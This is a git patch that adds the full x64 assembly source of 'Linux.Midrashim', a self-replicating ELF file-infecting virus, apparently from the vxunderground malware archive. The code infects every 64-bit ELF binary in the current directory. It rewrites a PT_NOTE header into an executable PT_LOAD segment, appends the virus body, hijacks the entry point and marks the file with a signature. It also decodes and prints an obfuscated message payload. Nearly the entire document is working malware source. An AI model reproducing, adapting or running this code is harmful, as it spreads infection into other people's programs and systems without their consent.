From b6e492132ef2bee5d470eee3ddafa04138c77541 Mon Sep 17 00:00:00 2001 From: vxunderground <57078196+vxunderground@users.noreply.github.com> Date: Sat, 7 Nov 2020 17:29:13 -0600 Subject: [PATCH] Add files via upload --- Linux/Linux.Midrashim.asm | 562 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 562 insertions(+) create mode 100644 Linux/Linux.Midrashim.asm diff --git a/Linux/Linux.Midrashim.asm b/Linux/Linux.Midrashim.asm new file mode 100644 index 00000000..226d0683 --- /dev/null +++ b/Linux/Linux.Midrashim.asm @@ -0,0 +1,562 @@ +; Linux.Midrashim +; Written by TMZ +; +; Finished on 30.05.2020 +; Released on 07.11.2020 +; The release was delayed because I was trying to code a fancy 90's style payload and due to lack of time, I'll leave this to another project. +; This is my first full assembly virus and should be assembled with FASM x64. +; - relies on PT_NOTE -> PT_LOAD infection technique and should work on regular x64 ELF executables (position independent or not). +; - should use mmap but instead it uses pread and pwrite (due to lazyness). +; - stores stuff on memory buffer (r15 register). +; - infects current directory (non recursively). +; - has several parts that could have improved, like detecting first virus execution with a better approach. +; +; Payload (non destructive) is a quote from a song and it's encoded for no reason whatsoever. +; +; A big thanks for those who keeps the VX scene alive! +; Feel free to email me: tmz@null.net || tmz@syscall.sh || thomazi@linux.com +; @guitmz || @TMZvx +; https://www.guitmz.com +; https://syscall.sh +; +; Use at your own risk, I'm not responsible for any damages that this may cause, do not spread it into the wild! +; +; References: +; https://www.symbolcrash.com/2019/03/27/pt_note-to-pt_load-injection-in-elf +; https://www.wikidata.org/wiki/Q6041496 +; https://legacyofkain.fandom.com/wiki/Ozar_Midrashim +; https://en.wikipedia.org/wiki/Don%27t_Be_Afraid_(album) +; +; Stack buffer: +; r15 + 0 = stack buffer (10000 bytes) = stat +; r15 + 48 = stat.st_size +; r15 + 144 = ehdr +; r15 + 148 = ehdr.class +; r15 + 152 = ehdr.pad +; r15 + 168 = ehdr.entry +; r15 + 176 = ehdr.phoff +; r15 + 198 = ehdr.phentsize +; r15 + 200 = ehdr.phnum +; r15 + 208 = phdr = phdr.type +; r15 + 212 = phdr.flags +; r15 + 216 = phdr.offset +; r15 + 224 = phdr.vaddr +; r15 + 232 = phdr.paddr +; r15 + 240 = phdr.filesz +; r15 + 248 = phdr.memsz +; r15 + 256 = phdr.align +; r15 + 300 = jmp rel +; r15 + 350 = directory size +; r15 + 400 = dirent = dirent.d_ino +; r15 + 416 = dirent.d_reclen +; r15 + 418 = dirent.d_type +; r15 + 419 = dirent.d_name +; r15 + 3000 = first run control flag +; r15 + 3001 = decoded payload + +format ELF64 executable 3 + +SYS_EXIT = 60 +SYS_OPEN = 2 +SYS_CLOSE = 3 +SYS_WRITE = 1 +SYS_READ = 0 +SYS_EXECVE = 59 +SYS_GETDENTS64 = 217 +SYS_FSTAT = 5 +SYS_LSEEK = 8 +SYS_PREAD64 = 17 +SYS_PWRITE64 = 18 +SYS_SYNC = 162 +STDOUT = 1 +EHDR_SIZE = 64 +ELFCLASS64 = 2 +O_RDONLY = 0 +O_RDWR = 2 +SEEK_END = 2 +DIRENT_BUFSIZE = 1024 +MFD_CLOEXEC = 1 +DT_REG = 8 +PT_LOAD = 1 +PT_NOTE = 4 +PF_X = 1 +PF_R = 4 +FIRST_RUN = 1 +V_SIZE = 2631 + +segment readable executable +entry v_start + +v_start: + mov r14, [rsp + 8] ; saving argv0 to r14 + push rdx + push rsp + sub rsp, 5000 ; reserving 5000 bytes + mov r15, rsp ; r15 has the reserved stack buffer address + + check_first_run: + mov rdi, r14 ; argv0 to rdi + mov rsi, O_RDONLY + xor rdx, rdx ; not using any flags + mov rax, SYS_OPEN + syscall ; rax contains the argv0 fd + + mov rdi, rax + mov rsi, r15 ; rsi = r15 = stack buffer address + mov rax, SYS_FSTAT ; getting argv0 size in bytes + syscall ; stat.st_size = [r15 + 48] + + cmp qword [r15 + 48], V_SIZE ; compare argv0 size with virus size + jg load_dir ; if greater, not first run, continue infecting without setting control flag + + mov byte [r15 + 3000], FIRST_RUN ; set the control flag to [r15 + 3000] to represent virus first execution, not a great approach but will do for now + + load_dir: + push "." ; pushing "." to stack (rsp) + mov rdi, rsp ; moving "." to rdi + mov rsi, O_RDONLY + xor rdx, rdx ; not using any flags + mov rax, SYS_OPEN + syscall ; rax contains the fd + + pop rdi + cmp rax, 0 ; if can't open file, exit now + jbe v_stop + + mov rdi, rax ; move fd to rdi + lea rsi, [r15 + 400] ; rsi = dirent = [r15 + 400] + mov rdx, DIRENT_BUFSIZE ; buffer with maximum directory size + mov rax, SYS_GETDENTS64 + syscall ; dirent contains the directory entries + + test rax, rax ; check directory list was successful + js v_stop ; if negative code is returned, I failed and should exit + + mov qword [r15 + 350], rax ; [r15 + 350] now holds directory size + + mov rax, SYS_CLOSE ; close source fd in rdi + syscall + + xor rcx, rcx ; will be the position in the directory entries + + file_loop: + push rcx ; preserving rcx (important!!!) + cmp byte [rcx + r15 + 418], DT_REG ; check if it's a regular file dirent.d_type = [r15 + 418] + jne .continue ; if not, proceed to next file + + .open_target_file: + lea rdi, [rcx + r15 + 419] ; dirent.d_name = [r15 + 419] + mov rsi, O_RDWR + xor rdx, rdx ; not using any flags + mov rax, SYS_OPEN + syscall + + cmp rax, 0 ; if can't open file, exit now + jbe .continue + mov r9, rax ; r9 contains target fd + + .read_ehdr: + mov rdi, r9 ; r9 contains fd + lea rsi, [r15 + 144] ; rsi = ehdr = [r15 + 144] + mov rdx, EHDR_SIZE ; ehdr.size + mov r10, 0 ; read at offset 0 + mov rax, SYS_PREAD64 + syscall + + .is_elf: + cmp dword [r15 + 144], 0x464c457f ; 0x464c457f means .ELF (little-endian) + jnz .close_file ; not an ELF binary, close and continue to next file if any + + .is_64: + cmp byte [r15 + 148], ELFCLASS64 ; check if target ELF is 64bit + jne .close_file ; skipt it if not + + .is_infected: + cmp dword [r15 + 152], 0x005a4d54 ; check signature in [r15 + 152] ehdr.pad (TMZ in little-endian, plus trailing zero to fill up a word size) + jz .close_file ; already infected, close and continue to next file if any + + mov r8, [r15 + 176] ; r8 now holds ehdr.phoff from [r15 + 176] + xor rbx, rbx ; initializing phdr loop counter in rbx + xor r14, r14 ; r14 will hold phdr file offset + + .loop_phdr: + mov rdi, r9 ; r9 contains fd + lea rsi, [r15 + 208] ; rsi = phdr = [r15 + 208] + mov dx, word [r15 + 198] ; ehdr.phentsize is at [r15 + 198] + mov r10, r8 ; read at ehdr.phoff from r8 (incrementing ehdr.phentsize each loop iteraction) + mov rax, SYS_PREAD64 + syscall + + cmp byte [r15 + 208], PT_NOTE ; check if phdr.type in [r15 + 208] is PT_NOTE (4) + jz .infect ; if yes, jackpot, start infecting + + inc rbx ; if not, increase rbx counter + cmp bx, word [r15 + 200] ; check if we looped through all phdrs already (ehdr.phnum = [r15 + 200]) + jge .close_file ; exit if no valid phdr for infection was found + + add r8w, word [r15 + 198] ; otherwise, add current ehdr.phentsize from [r15 + 198] into r8w + jnz .loop_phdr ; read next phdr + + .infect: + .get_target_phdr_file_offset: + mov ax, bx ; loading phdr loop counter bx to ax + mov dx, word [r15 + 198] ; loading ehdr.phentsize from [r15 + 198] to dx + imul dx ; bx * ehdr.phentsize + mov r14w, ax + add r14, [r15 + 176] ; r14 = ehdr.phoff + (bx * ehdr.phentsize) + + .file_info: + mov rdi, r9 + mov rsi, r15 ; rsi = r15 = stack buffer address + mov rax, SYS_FSTAT + syscall ; stat.st_size = [r15 + 48] + + .append_virus: + ; getting target EOF + mov rdi, r9 ; r9 contains fd + mov rsi, 0 ; seek offset 0 + mov rdx, SEEK_END + mov rax, SYS_LSEEK + syscall ; getting target EOF offset in rax + push rax ; saving target EOF + + call .delta ; the age old trick + .delta: + pop rbp + sub rbp, .delta + + ; writing virus body to EOF + mov rdi, r9 ; r9 contains fd + lea rsi, [rbp + v_start] ; loading v_start address in rsi + mov rdx, v_stop - v_start ; virus size + mov r10, rax ; rax contains target EOF offset from previous syscall + mov rax, SYS_PWRITE64 + syscall + + cmp rax, 0 + jbe .close_file + + .patch_phdr: + mov dword [r15 + 208], PT_LOAD ; change phdr type in [r15 + 208] from PT_NOTE to PT_LOAD (1) + mov dword [r15 + 212], PF_R or PF_X ; change phdr.flags in [r15 + 212] to PF_X (1) | PF_R (4) + pop rax ; restoring target EOF offeset into rax + mov [r15 + 216], rax ; phdr.offset [r15 + 216] = target EOF offset + mov r13, [r15 + 48] ; storing target stat.st_size from [r15 + 48] in r13 + add r13, 0xc000000 ; adding 0xc000000 to target file size + mov [r15 + 224], r13 ; changing phdr.vaddr in [r15 + 224] to new one in r13 (stat.st_size + 0xc000000) + mov qword [r15 + 256], 0x200000 ; set phdr.align in [r15 + 256] to 2mb + add qword [r15 + 240], v_stop - v_start + 5 ; add virus size to phdr.filesz in [r15 + 240] + 5 for the jmp to original ehdr.entry + add qword [r15 + 248], v_stop - v_start + 5 ; add virus size to phdr.memsz in [r15 + 248] + 5 for the jmp to original ehdr.entry + + ; writing patched phdr + mov rdi, r9 ; r9 contains fd + mov rsi, r15 ; rsi = r15 = stack buffer address + lea rsi, [r15 + 208] ; rsi = phdr = [r15 + 208] + mov dx, word [r15 + 198] ; ehdr.phentsize from [r15 + 198] + mov r10, r14 ; phdr from [r15 + 208] + mov rax, SYS_PWRITE64 + syscall + + cmp rax, 0 + jbe .close_file + + .patch_ehdr: + ; patching ehdr + mov r14, [r15 + 168] ; storing target original ehdr.entry from [r15 + 168] in r14 + mov [r15 + 168], r13 ; set ehdr.entry in [r15 + 168] to r13 (phdr.vaddr) + mov r13, 0x005a4d54 ; loading virus signature into r13 (TMZ in little-endian) + mov [r15 + 152], r13 ; adding the virus signature to ehdr.pad in [r15 + 152] + + ; writing patched ehdr + mov rdi, r9 ; r9 contains fd + lea rsi, [r15 + 144] ; rsi = ehdr = [r15 + 144] + mov rdx, EHDR_SIZE ; ehdr.size + mov r10, 0 ; ehdr.offset + mov rax, SYS_PWRITE64 + syscall + + cmp rax, 0 + jbe .close_file + + .write_patched_jmp: + ; getting target new EOF + mov rdi, r9 ; r9 contains fd + mov rsi, 0 ; seek offset 0 + mov rdx, SEEK_END + mov rax, SYS_LSEEK + syscall ; getting target EOF offset in rax + + ; creating patched jmp + mov rdx, [r15 + 224] ; rdx = phdr.vaddr + add rdx, 5 + sub r14, rdx + sub r14, v_stop - v_start + mov byte [r15 + 300 ], 0xe9 + mov dword [r15 + 301], r14d + + ; writing patched jmp to EOF + mov rdi, r9 ; r9 contains fd + lea rsi, [r15 + 300] ; rsi = patched jmp in stack buffer = [r15 + 208] + mov rdx, 5 ; size of jmp rel + mov r10, rax ; mov rax to r10 = new target EOF + mov rax, SYS_PWRITE64 + syscall + + cmp rax, 0 + jbe .close_file + + mov rax, SYS_SYNC ; commiting filesystem caches to disk + syscall + + .close_file: + mov rax, SYS_CLOSE ; close source fd in rdi + syscall + + .continue: + pop rcx + add cx, word [rcx + r15 + 416] ; adding directory record lenght to cx (lower rcx, for word) + cmp rcx, qword [r15 + 350] ; comparing rcx counter with r10 (directory records total size) + jne file_loop ; if counter is not the same, continue loop. Exit virus otherwise + + cmp byte [r15 + 3000], FIRST_RUN ; checking if custom control flag we set earlier indicates virus first execution + jnz infected_run ; if control flag != 1, it should be running from an infected file, use normal payload + call show_msg ; if control flag == 1, assume virus is being executed for the first time and display a different message + info_msg: + db 'Midrashim by TMZ (c) 2020', 0xa ; not the nicest approach like I mentioned before but quick to implement + info_len = $-info_msg + show_msg: + pop rsi ; info_msg address to rsi + mov rax, SYS_WRITE + mov rdi, STDOUT ; display payload + mov rdx, info_len + syscall + jmp cleanup ; cleanup and exit + + infected_run: + ; 1337 encoded payload, very hax0r + call payload + msg: + ; payload first part + db 0x59, 0x7c, 0x95, 0x95, 0x57, 0x9e, 0x9d, 0x57 + db 0xa3, 0x9f, 0x92, 0x57, 0x93, 0x9e, 0xa8, 0xa3 + db 0x96, 0x9d, 0x98, 0x92, 0x57, 0x7e, 0x57, 0x98 + db 0x96, 0x9d, 0x57, 0xa8, 0x92, 0x92, 0x57, 0x96 + db 0x57, 0x9f, 0xa2, 0x94, 0x92, 0x57, 0x9f, 0x9c + db 0x9b, 0x9c, 0x94, 0xa9, 0x96, 0xa7, 0x9f, 0x9e + db 0x98, 0x57, 0x89, 0x9c, 0x9d, 0x96, 0x9b, 0x93 + db 0x57, 0x7a, 0x98, 0x73, 0x9c, 0x9d, 0x96, 0x9b + db 0x93, 0x57, 0xa4, 0x96, 0x9b, 0xa0, 0x9e, 0x9d + db 0x94, 0x57, 0x99, 0x92, 0xa3, 0xa4, 0x92, 0x92 + db 0x9d, 0x57, 0xa3, 0x9f, 0x92, 0x57, 0x94, 0xa9 + db 0x96, 0x9e, 0x9d, 0x57, 0x92, 0x9b, 0x92, 0xa5 + db 0x96, 0xa3, 0x9c, 0xa9, 0xa8, 0x57, 0x96, 0x9d + db 0x93, 0x57, 0xa3, 0xa9, 0x92, 0x92, 0xa8, 0x41 + db 0x7c, 0x9f, 0x5b, 0x57, 0x9e, 0x95, 0x57, 0x7e + db 0x57, 0x9f, 0x96, 0x93, 0x57, 0xa3, 0x9f, 0x92 + db 0x57, 0x9a, 0x9c, 0x9d, 0x92, 0xae, 0x57, 0x7e + db 0x54, 0x93, 0x57, 0x9f, 0x96, 0xa5, 0x92, 0x57 + db 0x54, 0x92, 0x9a, 0x57, 0x9a, 0x96, 0xa0, 0x92 + db 0x57, 0x9c, 0x9d, 0x92, 0x57, 0x9c, 0x95, 0x57 + db 0xa3, 0x9f, 0x9c, 0xa8, 0x92, 0x57, 0x9a, 0x92 + db 0x5b, 0x57, 0xa3, 0x9f, 0x92, 0x9d, 0x57, 0x7e + db 0x54, 0x93, 0x57, 0xa8, 0x92, 0x9d, 0x93, 0x57 + db 0x9a, 0xae, 0xa8, 0x92, 0x9b, 0x95, 0x57, 0xa3 + db 0x9c, 0x57, 0xa8, 0xa3, 0x96, 0x9b, 0xa0, 0x57 + db 0xa3, 0x9f, 0x92, 0x57, 0x9b, 0x96, 0x9d, 0x93 + db 0xa8, 0x98, 0x96, 0xa7, 0x92, 0x57, 0x96, 0x9d + db 0x93, 0x57, 0xa8, 0x98, 0x96, 0xa9, 0x92, 0x57 + db 0x92, 0xa5, 0x92, 0xa9, 0xae, 0x99, 0x9c, 0x93 + db 0xae, 0x41, 0x8e, 0x9c, 0xa2, 0x57, 0xa8, 0x92 + db 0x92, 0x5b, 0x57, 0x54, 0x98, 0x96, 0xa2, 0xa8 + db 0x92, 0x57, 0x7e, 0x57, 0x94, 0x9c, 0xa3, 0x57 + db 0xa3, 0x9f, 0x9e, 0xa8, 0x57, 0xa8, 0x9c, 0xa9 + db 0xa3, 0x57, 0x9c, 0x95, 0x57, 0x95, 0x9e, 0x92 + db 0x9b, 0x93, 0x57, 0x99, 0x92, 0x9f, 0x9e, 0x9d + db 0x93, 0x57, 0x9a, 0x92, 0x5d, 0x57, 0x79, 0x92 + db 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x5d, 0x5d, 0x5d + db 0x57, 0x54, 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57 + db 0x7e, 0x54, 0xa5, 0x92, 0x57, 0x94, 0x9c, 0xa3 + db 0x57, 0xa8, 0xa7, 0x9e, 0xa0, 0x92, 0xa8, 0x41 + db 0x79, 0x92, 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57 + db 0x7e, 0x57, 0x94, 0x9c, 0x57, 0x99, 0x92, 0xa3 + db 0xa4, 0x92, 0x92, 0x9d, 0x57, 0xa3, 0x9f, 0x92 + db 0x57, 0xb1, 0x9c, 0x9d, 0x92, 0xa8, 0x5b, 0x57 + db 0x92, 0xa5, 0x92, 0x9d, 0x57, 0xa4, 0x9f, 0x92 + db 0x9d, 0x57, 0x7e, 0x54, 0x9a, 0x57, 0x9d, 0x9c + db 0xa3, 0x57, 0xa8, 0xa2, 0xa7, 0xa7, 0x9c, 0xa8 + db 0x92, 0x93, 0x57, 0xa3, 0x9c, 0x41, 0x79, 0x92 + db 0x98, 0x96, 0xa2, 0xa8, 0x92, 0x57, 0x7e, 0x54 + db 0x9a, 0x57, 0x96, 0x57, 0xa8, 0xa2, 0xa8, 0xa7 + db 0x9e, 0x98, 0x9e, 0x9c, 0xa2, 0xa8, 0x57, 0xa7 + db 0x92, 0xa9, 0xa8, 0x9c, 0x9d, 0x57, 0xa9, 0x92 + db 0xa7, 0x9c, 0xa9, 0xa3, 0x57, 0x41, 0x76, 0x9d + db 0x93, 0x57, 0x9e, 0xa3, 0x54, 0xa8, 0x57, 0xa3 + db 0x9e, 0x9a, 0x92, 0x57, 0xa3, 0x9c, 0x57, 0x94 + db 0x9c, 0x57, 0xa8, 0x9f, 0x9c, 0xa7, 0xa7, 0x9e + db 0x9d, 0x94, 0x5d, 0x59, 0x41, 0x37, 0x41 + ; payload second part + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55 + db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x58 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55 + db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55 + db 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55 + db 0x55, 0x55, 0x58, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55 + db 0x55, 0x55, 0x5d, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x52, 0x55, 0x55, 0x55, 0x55, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x55 + db 0x55, 0x55, 0x55, 0x5d, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x5d + db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x55 + db 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55 + db 0x55, 0x55, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55 + db 0x57, 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x55 + db 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55 + db 0x55, 0x55, 0x55, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x55, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x55, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x55, 0x55, 0x55, 0x57, 0x55 + db 0x55, 0x55, 0x52, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x61, 0x55, 0x55, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x55 + db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x55, 0x55, 0x57, 0x55 + db 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x55, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x55, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x41 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57, 0x57 + db 0x57, 0x57, 0x57, 0x57, 0x57, 0x55, 0x57, 0x55 + db 0x41 + len = $-msg + + payload: + pop rsi ; setting up decoding loop + mov rcx, len + lea rdi, [r15 + 3001] + + .decode: + lodsb ; load byte from rsi into al + sub al, 50 ; decoding it + xor al, 5 + stosb ; store byte from al into rdi + loop .decode ; sub 1 from rcx and continue loop until rcx = 0 + + lea rsi, [r15 + 3001] ; decoded payload is at [r15 + 3000] + mov rax, SYS_WRITE + mov rdi, STDOUT ; display payload + mov rdx, len + syscall + +cleanup: + add rsp, 5000 ; restoring stack so host process can run normally, this also could use some improvement + pop rsp + pop rdx + +v_stop: + xor rdi, rdi ; exit code 0 + mov rax, SYS_EXIT + syscall